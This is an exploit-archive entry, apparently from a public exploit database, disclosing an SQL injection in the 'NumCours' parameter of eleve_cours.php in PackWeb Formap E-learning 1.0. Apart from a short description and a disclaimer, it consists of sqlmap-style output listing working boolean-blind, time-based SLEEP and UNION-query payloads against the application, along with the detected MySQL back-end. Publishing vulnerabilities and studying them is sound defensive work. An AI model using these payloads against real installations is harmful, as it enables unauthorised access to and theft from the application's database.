Exploits / Vulnerability Discovered : 2020-02-07 |
Type : webapps |
Platform : php
This exploit / vulnerability Packweb formap elearning 1.0 numcours sql injection is for educational purposes only and if it is used you will do on your own risk!
# Description:
# The PackWeb Formap E-learning application from EDISER is vulnerable to
# SQL injection via the 'NumCours' parameter on the eleve_cours.php
==================== 1. SQLi ====================
http://localhost/eleve_cours.php?NumCours=[SQLI]
The 'NumCours' parameter is vulnerable to SQL injection.
GET parameter 'NumCours' is vulnerable.
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://localhost/eleve_cours.php?NumCours=-9758' OR 6342=6342-- rSaq&static=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)
Payload: http://localhost/eleve_cours.php?NumCours=' AND SLEEP(5)-- rGcs&static=1
Type: UNION query
Title: MySQL UNION query (47) - 1 column
Payload: http://localhost/eleve_cours.php?NumCours=' UNION ALL SELECT CONCAT(0x7176707171,0x58794e58714e52434d7879444262574a506d6f41526e636444674d5a6863667a6943517841654d54,0x717a7a6a71)#&static=1
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12